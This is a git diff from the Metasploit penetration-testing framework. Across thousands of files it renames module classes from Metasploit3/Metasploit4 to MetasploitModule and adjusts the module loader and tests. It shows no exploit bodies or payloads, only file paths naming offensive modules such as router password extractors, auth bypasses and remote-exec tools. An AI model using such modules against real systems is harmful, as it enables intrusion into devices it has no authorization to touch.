modules/post/windows/manage/remove_host.rb | 2 +- modules/post/windows/manage/rpcapd_start.rb | 2 +- modules/post/windows/manage/run_as.rb | 2 +- modules/post/windows/manage/sdel.rb | 2 +- modules/post/windows/manage/smart_migrate.rb | 2 +- modules/post/windows/manage/sticky_keys.rb | 2 +- modules/post/windows/manage/vss_create.rb | 2 +- modules/post/windows/manage/vss_list.rb | 2 +- modules/post/windows/manage/vss_mount.rb | 2 +- modules/post/windows/manage/vss_set_storage.rb | 2 +- modules/post/windows/manage/vss_storage.rb | 2 +- modules/post/windows/manage/webcam.rb | 2 +- .../windows/recon/computer_browser_discovery.rb | 2 +- modules/post/windows/recon/outbound_ports.rb | 2 +- modules/post/windows/recon/resolve_ip.rb | 2 +- modules/post/windows/wlan/wlan_bss_list.rb | 2 +- .../post/windows/wlan/wlan_current_connection.rb | 2 +- modules/post/windows/wlan/wlan_disconnect.rb | 2 +- modules/post/windows/wlan/wlan_profile.rb | 2 +- .../modules/auxiliary/auxiliary_tidy.rb | 3 +-- .../modules/auxiliary/auxiliary_untidy.rb | 3 +-- spec/lib/msf/core/modules/loader/base_spec.rb | 10 +++++----- tools/dev/msftidy.rb | 9 ++++++++- 3038 files changed, 3056 insertions(+), 3052 deletions(-) diff --git a/lib/msf/core/exploit/ftpserver.rb b/lib/msf/core/exploit/ftpserver.rb index e1990f69ad..df6b2c91ee 100644 --- a/lib/msf/core/exploit/ftpserver.rb +++ b/lib/msf/core/exploit/ftpserver.rb @@ -56,7 +56,7 @@ module Exploit::Remote::FtpServer # exists for the given command, returns a generic default response. # # @example Handle SYST requests - # class Metasploit < Msf::Exploit + # class MetasploitModule < Msf::Exploit # include Msf::Exploit::Remote::FtpServer # ... # def on_client_command_syst(cmd_conn, arg) @@ -237,4 +237,3 @@ module Exploit::Remote::FtpServer end end - diff --git a/lib/msf/core/exploit/smb/server/share.rb b/lib/msf/core/exploit/smb/server/share.rb index aaf949ef3b..df5f43aca6 100644 --- a/lib/msf/core/exploit/smb/server/share.rb +++ b/lib/msf/core/exploit/smb/server/share.rb @@ -17,7 +17,7 @@ module Msf # @example Use it from an Auxiliary module # require 'msf/core' # - # class Metasploit < Msf::Auxiliary + # class MetasploitModule < Msf::Auxiliary # # include Msf::Exploit::Remote::SMB::Server::Share # @@ -59,7 +59,7 @@ module Msf # @example Use it from an Exploit module # require 'msf/core' # - # class Metasploit < Msf::Exploit::Remote + # class MetasploitModule < Msf::Exploit::Remote # Rank = ExcellentRanking # # include Msf::Exploit::EXE diff --git a/lib/msf/core/modules/loader/base.rb b/lib/msf/core/modules/loader/base.rb index 95abfe0bd3..3e1a7845c3 100644 --- a/lib/msf/core/modules/loader/base.rb +++ b/lib/msf/core/modules/loader/base.rb @@ -148,17 +148,17 @@ class Msf::Modules::Loader::Base if namespace_module.const_defined?('Metasploit3', false) klass = namespace_module.const_get('Metasploit3', false) # We are not quite yet ready for the warnings to bubble to the user - # load_warning(module_path, 'Please change the modules class name from Metasploit3 to Metasploit') + # load_warning(module_path, 'Please change the modules class name from Metasploit3 to MetasploitModule') elsif namespace_module.const_defined?('Metasploit4', false) klass = namespace_module.const_get('Metasploit4', false) - # load_warning(module_path, 'Please change the modules class name from Metasploit4 to Metasploit') - elsif namespace_module.const_defined?('Metasploit', false) - klass = namespace_module.const_get('Metasploit', false) + # load_warning(module_path, 'Please change the modules class name from Metasploit4 to MetasploitModule') + elsif namespace_module.const_defined?('MetasploitModule', false) + klass = namespace_module.const_get('MetasploitModule', false) else load_error(module_path, Msf::Modules::Error.new({ :module_path => module_path, :module_reference_name => module_reference_name, - :causal_message => 'Invalid module (no Metasploit class or module name)' + :causal_message => 'Invalid module (no MetasploitModule class or module name)' })) return false end @@ -314,7 +314,7 @@ class Msf::Modules::Loader::Base protected - # Returns a nested module to wrap the Metasploit class so that it doesn't overwrite other (metasploit) + # Returns a nested module to wrap the MetasploitModule class so that it doesn't overwrite other (metasploit) # module's classes. The wrapper module must be named so that active_support's autoloading code doesn't break when # searching constants from inside the Metasploit class. # @@ -496,7 +496,7 @@ class Msf::Modules::Loader::Base end # Returns an Array of names to make a fully qualified module name to - # wrap the Metasploit class so that it doesn't overwrite other + # wrap the MetasploitModule class so that it doesn't overwrite other # (metasploit) module's classes. Invalid module name characters are # escaped by using 'H*' unpacking and prefixing each code with X so # the code remains a valid module name when it starts with a digit. diff --git a/modules/auxiliary/admin/2wire/xslt_password_reset.rb b/modules/auxiliary/admin/2wire/xslt_password_reset.rb index ee2572bebb..22b3306bdf 100644 --- a/modules/auxiliary/admin/2wire/xslt_password_reset.rb +++ b/modules/auxiliary/admin/2wire/xslt_password_reset.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/android/google_play_store_uxss_xframe_rce.rb b/modules/auxiliary/admin/android/google_play_store_uxss_xframe_rce.rb index d3aed5b3dc..a240380762 100644 --- a/modules/auxiliary/admin/android/google_play_store_uxss_xframe_rce.rb +++ b/modules/auxiliary/admin/android/google_play_store_uxss_xframe_rce.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer::HTML include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/appletv/appletv_display_image.rb b/modules/auxiliary/admin/appletv/appletv_display_image.rb index 5b009c7889..7d2a259628 100644 --- a/modules/auxiliary/admin/appletv/appletv_display_image.rb +++ b/modules/auxiliary/admin/appletv/appletv_display_image.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/appletv/appletv_display_video.rb b/modules/auxiliary/admin/appletv/appletv_display_video.rb index ff0370dc4a..c6a2d3d7f8 100644 --- a/modules/auxiliary/admin/appletv/appletv_display_video.rb +++ b/modules/auxiliary/admin/appletv/appletv_display_video.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'uri' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/atg/atg_client.rb b/modules/auxiliary/admin/atg/atg_client.rb index 357338b434..00af98129b 100644 --- a/modules/auxiliary/admin/atg/atg_client.rb +++ b/modules/auxiliary/admin/atg/atg_client.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/admin/backupexec/dump.rb b/modules/auxiliary/admin/backupexec/dump.rb index 7f76f33d07..2348397fe4 100644 --- a/modules/auxiliary/admin/backupexec/dump.rb +++ b/modules/auxiliary/admin/backupexec/dump.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::NDMP diff --git a/modules/auxiliary/admin/backupexec/registry.rb b/modules/auxiliary/admin/backupexec/registry.rb index 171d2d7a04..6cef2bf11d 100644 --- a/modules/auxiliary/admin/backupexec/registry.rb +++ b/modules/auxiliary/admin/backupexec/registry.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::DCERPC include ::Rex::Platforms::Windows diff --git a/modules/auxiliary/admin/chromecast/chromecast_reset.rb b/modules/auxiliary/admin/chromecast/chromecast_reset.rb index cd245599e9..123faba0f9 100644 --- a/modules/auxiliary/admin/chromecast/chromecast_reset.rb +++ b/modules/auxiliary/admin/chromecast/chromecast_reset.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/chromecast/chromecast_youtube.rb b/modules/auxiliary/admin/chromecast/chromecast_youtube.rb index 5263d13b1f..e11ac04cc8 100644 --- a/modules/auxiliary/admin/chromecast/chromecast_youtube.rb +++ b/modules/auxiliary/admin/chromecast/chromecast_youtube.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/cisco/cisco_secure_acs_bypass.rb b/modules/auxiliary/admin/cisco/cisco_secure_acs_bypass.rb index 6d93c9e626..2f574d8494 100644 --- a/modules/auxiliary/admin/cisco/cisco_secure_acs_bypass.rb +++ b/modules/auxiliary/admin/cisco/cisco_secure_acs_bypass.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/cisco/vpn_3000_ftp_bypass.rb b/modules/auxiliary/admin/cisco/vpn_3000_ftp_bypass.rb index c706eea4f0..43b4479c0b 100644 --- a/modules/auxiliary/admin/cisco/vpn_3000_ftp_bypass.rb +++ b/modules/auxiliary/admin/cisco/vpn_3000_ftp_bypass.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp diff --git a/modules/auxiliary/admin/db2/db2rcmd.rb b/modules/auxiliary/admin/db2/db2rcmd.rb index 6f8d5738fb..c712a12ebf 100644 --- a/modules/auxiliary/admin/db2/db2rcmd.rb +++ b/modules/auxiliary/admin/db2/db2rcmd.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::SMB::Client diff --git a/modules/auxiliary/admin/edirectory/edirectory_dhost_cookie.rb b/modules/auxiliary/admin/edirectory/edirectory_dhost_cookie.rb index ce62291515..f6dc37ff67 100644 --- a/modules/auxiliary/admin/edirectory/edirectory_dhost_cookie.rb +++ b/modules/auxiliary/admin/edirectory/edirectory_dhost_cookie.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp diff --git a/modules/auxiliary/admin/edirectory/edirectory_edirutil.rb b/modules/auxiliary/admin/edirectory/edirectory_edirutil.rb index 9fbc5aff7d..462536d3ff 100644 --- a/modules/auxiliary/admin/edirectory/edirectory_edirutil.rb +++ b/modules/auxiliary/admin/edirectory/edirectory_edirutil.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/emc/alphastor_devicemanager_exec.rb b/modules/auxiliary/admin/emc/alphastor_devicemanager_exec.rb index e2970315f0..df41d4d671 100644 --- a/modules/auxiliary/admin/emc/alphastor_devicemanager_exec.rb +++ b/modules/auxiliary/admin/emc/alphastor_devicemanager_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp diff --git a/modules/auxiliary/admin/emc/alphastor_librarymanager_exec.rb b/modules/auxiliary/admin/emc/alphastor_librarymanager_exec.rb index 1c54a65368..881f0d5e75 100644 --- a/modules/auxiliary/admin/emc/alphastor_librarymanager_exec.rb +++ b/modules/auxiliary/admin/emc/alphastor_librarymanager_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp diff --git a/modules/auxiliary/admin/firetv/firetv_youtube.rb b/modules/auxiliary/admin/firetv/firetv_youtube.rb index ffeedd5885..8fec58c5e0 100644 --- a/modules/auxiliary/admin/firetv/firetv_youtube.rb +++ b/modules/auxiliary/admin/firetv/firetv_youtube.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/hp/hp_data_protector_cmd.rb b/modules/auxiliary/admin/hp/hp_data_protector_cmd.rb index 1c99844b0f..0b1ef1ba24 100644 --- a/modules/auxiliary/admin/hp/hp_data_protector_cmd.rb +++ b/modules/auxiliary/admin/hp/hp_data_protector_cmd.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp diff --git a/modules/auxiliary/admin/hp/hp_imc_som_create_account.rb b/modules/auxiliary/admin/hp/hp_imc_som_create_account.rb index 3f21a39c33..272e9f4d82 100644 --- a/modules/auxiliary/admin/hp/hp_imc_som_create_account.rb +++ b/modules/auxiliary/admin/hp/hp_imc_som_create_account.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/http/arris_motorola_surfboard_backdoor_xss.rb b/modules/auxiliary/admin/http/arris_motorola_surfboard_backdoor_xss.rb index 55f85637ae..035c3ae179 100644 --- a/modules/auxiliary/admin/http/arris_motorola_surfboard_backdoor_xss.rb +++ b/modules/auxiliary/admin/http/arris_motorola_surfboard_backdoor_xss.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer::HTML include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/http/axigen_file_access.rb b/modules/auxiliary/admin/http/axigen_file_access.rb index 6e6a7939a0..7a08a1366d 100644 --- a/modules/auxiliary/admin/http/axigen_file_access.rb +++ b/modules/auxiliary/admin/http/axigen_file_access.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/http/cfme_manageiq_evm_pass_reset.rb b/modules/auxiliary/admin/http/cfme_manageiq_evm_pass_reset.rb index 9d89a5b782..29706ecd39 100644 --- a/modules/auxiliary/admin/http/cfme_manageiq_evm_pass_reset.rb +++ b/modules/auxiliary/admin/http/cfme_manageiq_evm_pass_reset.rb @@ -8,7 +8,7 @@ require 'bcrypt' require 'digest' require 'openssl' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/http/contentkeeper_fileaccess.rb b/modules/auxiliary/admin/http/contentkeeper_fileaccess.rb index 725f125d26..a61bc6e376 100644 --- a/modules/auxiliary/admin/http/contentkeeper_fileaccess.rb +++ b/modules/auxiliary/admin/http/contentkeeper_fileaccess.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/admin/http/dlink_dir_300_600_exec_noauth.rb b/modules/auxiliary/admin/http/dlink_dir_300_600_exec_noauth.rb index cc807330d1..c69c44eb88 100644 --- a/modules/auxiliary/admin/http/dlink_dir_300_600_exec_noauth.rb +++ b/modules/auxiliary/admin/http/dlink_dir_300_600_exec_noauth.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/http/dlink_dir_645_password_extractor.rb b/modules/auxiliary/admin/http/dlink_dir_645_password_extractor.rb index e7e9f7de48..d47959957a 100644 --- a/modules/auxiliary/admin/http/dlink_dir_645_password_extractor.rb +++ b/modules/auxiliary/admin/http/dlink_dir_645_password_extractor.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/http/dlink_dsl320b_password_extractor.rb b/modules/auxiliary/admin/http/dlink_dsl320b_password_extractor.rb index cb17b5cc91..b1870cd699 100644 --- a/modules/auxiliary/admin/http/dlink_dsl320b_password_extractor.rb +++ b/modules/auxiliary/admin/http/dlink_dsl320b_password_extractor.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/http/foreman_openstack_satellite_priv_esc.rb b/modules/auxiliary/admin/http/foreman_openstack_satellite_priv_esc.rb index 0fb48eb584..b4f8b16898 100644 --- a/modules/auxiliary/admin/http/foreman_openstack_satellite_priv_esc.rb +++ b/modules/auxiliary/admin/http/foreman_openstack_satellite_priv_esc.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/http/hp_web_jetadmin_exec.rb b/modules/auxiliary/admin/http/hp_web_jetadmin_exec.rb index 5a1fcb3cd2..0889e7a690 100644 --- a/modules/auxiliary/admin/http/hp_web_jetadmin_exec.rb +++ b/modules/auxiliary/admin/http/hp_web_jetadmin_exec.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/http/iis_auth_bypass.rb b/modules/auxiliary/admin/http/iis_auth_bypass.rb index 0d999c859a..2cf37c785d 100644 --- a/modules/auxiliary/admin/http/iis_auth_bypass.rb +++ b/modules/auxiliary/admin/http/iis_auth_bypass.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/http/intersil_pass_reset.rb b/modules/auxiliary/admin/http/intersil_pass_reset.rb index 036a3ee2cc..18de11b8c8 100644 --- a/modules/auxiliary/admin/http/intersil_pass_reset.rb +++ b/modules/auxiliary/admin/http/intersil_pass_reset.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/http/iomega_storcenterpro_sessionid.rb b/modules/auxiliary/admin/http/iomega_storcenterpro_sessionid.rb index e3b3932032..1553569111 100644 --- a/modules/auxiliary/admin/http/iomega_storcenterpro_sessionid.rb +++ b/modules/auxiliary/admin/http/iomega_storcenterpro_sessionid.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/http/jboss_bshdeployer.rb b/modules/auxiliary/admin/http/jboss_bshdeployer.rb index 1e1d9dbf8d..0dfad0849f 100644 --- a/modules/auxiliary/admin/http/jboss_bshdeployer.rb +++ b/modules/auxiliary/admin/http/jboss_bshdeployer.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HTTP::JBoss diff --git a/modules/auxiliary/admin/http/jboss_deploymentfilerepository.rb b/modules/auxiliary/admin/http/jboss_deploymentfilerepository.rb index a427ac2009..03f6ee6c75 100644 --- a/modules/auxiliary/admin/http/jboss_deploymentfilerepository.rb +++ b/modules/auxiliary/admin/http/jboss_deploymentfilerepository.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HTTP::JBoss diff --git a/modules/auxiliary/admin/http/jboss_seam_exec.rb b/modules/auxiliary/admin/http/jboss_seam_exec.rb index e6b097d165..dc8ab507f2 100644 --- a/modules/auxiliary/admin/http/jboss_seam_exec.rb +++ b/modules/auxiliary/admin/http/jboss_seam_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/http/kaseya_master_admin.rb b/modules/auxiliary/admin/http/kaseya_master_admin.rb index d7046167c7..27758ccaf5 100644 --- a/modules/auxiliary/admin/http/kaseya_master_admin.rb +++ b/modules/auxiliary/admin/http/kaseya_master_admin.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/http/katello_satellite_priv_esc.rb b/modules/auxiliary/admin/http/katello_satellite_priv_esc.rb index e442620315..77d4c9095a 100644 --- a/modules/auxiliary/admin/http/katello_satellite_priv_esc.rb +++ b/modules/auxiliary/admin/http/katello_satellite_priv_esc.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/http/limesurvey_file_download.rb b/modules/auxiliary/admin/http/limesurvey_file_download.rb index a1c019c933..2dc0009268 100644 --- a/modules/auxiliary/admin/http/limesurvey_file_download.rb +++ b/modules/auxiliary/admin/http/limesurvey_file_download.rb @@ -8,7 +8,7 @@ require 'msf/core' # for extracting files require 'zip' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/http/linksys_e1500_e2500_exec.rb b/modules/auxiliary/admin/http/linksys_e1500_e2500_exec.rb index 0bae51aafa..e462ad3985 100644 --- a/modules/auxiliary/admin/http/linksys_e1500_e2500_exec.rb +++ b/modules/auxiliary/admin/http/linksys_e1500_e2500_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/http/linksys_tmunblock_admin_reset_bof.rb b/modules/auxiliary/admin/http/linksys_tmunblock_admin_reset_bof.rb index f5b371da2b..9aaf2112f8 100644 --- a/modules/auxiliary/admin/http/linksys_tmunblock_admin_reset_bof.rb +++ b/modules/auxiliary/admin/http/linksys_tmunblock_admin_reset_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/http/linksys_wrt54gl_exec.rb b/modules/auxiliary/admin/http/linksys_wrt54gl_exec.rb index c1ad331aae..1ab5cca3ca 100644 --- a/modules/auxiliary/admin/http/linksys_wrt54gl_exec.rb +++ b/modules/auxiliary/admin/http/linksys_wrt54gl_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/http/manage_engine_dc_create_admin.rb b/modules/auxiliary/admin/http/manage_engine_dc_create_admin.rb index 871d6c8830..520a9b8c79 100644 --- a/modules/auxiliary/admin/http/manage_engine_dc_create_admin.rb +++ b/modules/auxiliary/admin/http/manage_engine_dc_create_admin.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/http/manageengine_dir_listing.rb b/modules/auxiliary/admin/http/manageengine_dir_listing.rb index 9d782c370c..6c3f67dcd8 100644 --- a/modules/auxiliary/admin/http/manageengine_dir_listing.rb +++ b/modules/auxiliary/admin/http/manageengine_dir_listing.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/http/manageengine_file_download.rb b/modules/auxiliary/admin/http/manageengine_file_download.rb index fe04617a13..a7c393952d 100644 --- a/modules/auxiliary/admin/http/manageengine_file_download.rb +++ b/modules/auxiliary/admin/http/manageengine_file_download.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb b/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb index 0dc6890946..032c4d5db7 100644 --- a/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb +++ b/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/http/mutiny_frontend_read_delete.rb b/modules/auxiliary/admin/http/mutiny_frontend_read_delete.rb index d42ee31992..1fbc3bcf01 100644 --- a/modules/auxiliary/admin/http/mutiny_frontend_read_delete.rb +++ b/modules/auxiliary/admin/http/mutiny_frontend_read_delete.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/http/netflow_file_download.rb b/modules/auxiliary/admin/http/netflow_file_download.rb index 5b920ae2c0..43936f647b 100644 --- a/modules/auxiliary/admin/http/netflow_file_download.rb +++ b/modules/auxiliary/admin/http/netflow_file_download.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/http/netgear_auth_download.rb b/modules/auxiliary/admin/http/netgear_auth_download.rb index c79e02e6c4..0d4f97095a 100644 --- a/modules/auxiliary/admin/http/netgear_auth_download.rb +++ b/modules/auxiliary/admin/http/netgear_auth_download.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/http/netgear_soap_password_extractor.rb b/modules/auxiliary/admin/http/netgear_soap_password_extractor.rb index f7e8ee50c1..311355c401 100644 --- a/modules/auxiliary/admin/http/netgear_soap_password_extractor.rb +++ b/modules/auxiliary/admin/http/netgear_soap_password_extractor.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/http/nexpose_xxe_file_read.rb b/modules/auxiliary/admin/http/nexpose_xxe_file_read.rb index 773973688e..c0636e47c6 100644 --- a/modules/auxiliary/admin/http/nexpose_xxe_file_read.rb +++ b/modules/auxiliary/admin/http/nexpose_xxe_file_read.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rapid7/nexpose' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/http/novell_file_reporter_filedelete.rb b/modules/auxiliary/admin/http/novell_file_reporter_filedelete.rb index 6a12988779..166c1ddaad 100644 --- a/modules/auxiliary/admin/http/novell_file_reporter_filedelete.rb +++ b/modules/auxiliary/admin/http/novell_file_reporter_filedelete.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/http/openbravo_xxe.rb b/modules/auxiliary/admin/http/openbravo_xxe.rb index 8f7bacd0cf..b07c68631f 100644 --- a/modules/auxiliary/admin/http/openbravo_xxe.rb +++ b/modules/auxiliary/admin/http/openbravo_xxe.rb @@ -8,7 +8,7 @@ require 'rex' require 'net/dns' require 'rexml/document' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/http/rails_devise_pass_reset.rb b/modules/auxiliary/admin/http/rails_devise_pass_reset.rb index 991b706893..52911870ca 100644 --- a/modules/auxiliary/admin/http/rails_devise_pass_reset.rb +++ b/modules/auxiliary/admin/http/rails_devise_pass_reset.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rexml/element' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/http/scrutinizer_add_user.rb b/modules/auxiliary/admin/http/scrutinizer_add_user.rb index 4f7a947b08..01194f368d 100644 --- a/modules/auxiliary/admin/http/scrutinizer_add_user.rb +++ b/modules/auxiliary/admin/http/scrutinizer_add_user.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < 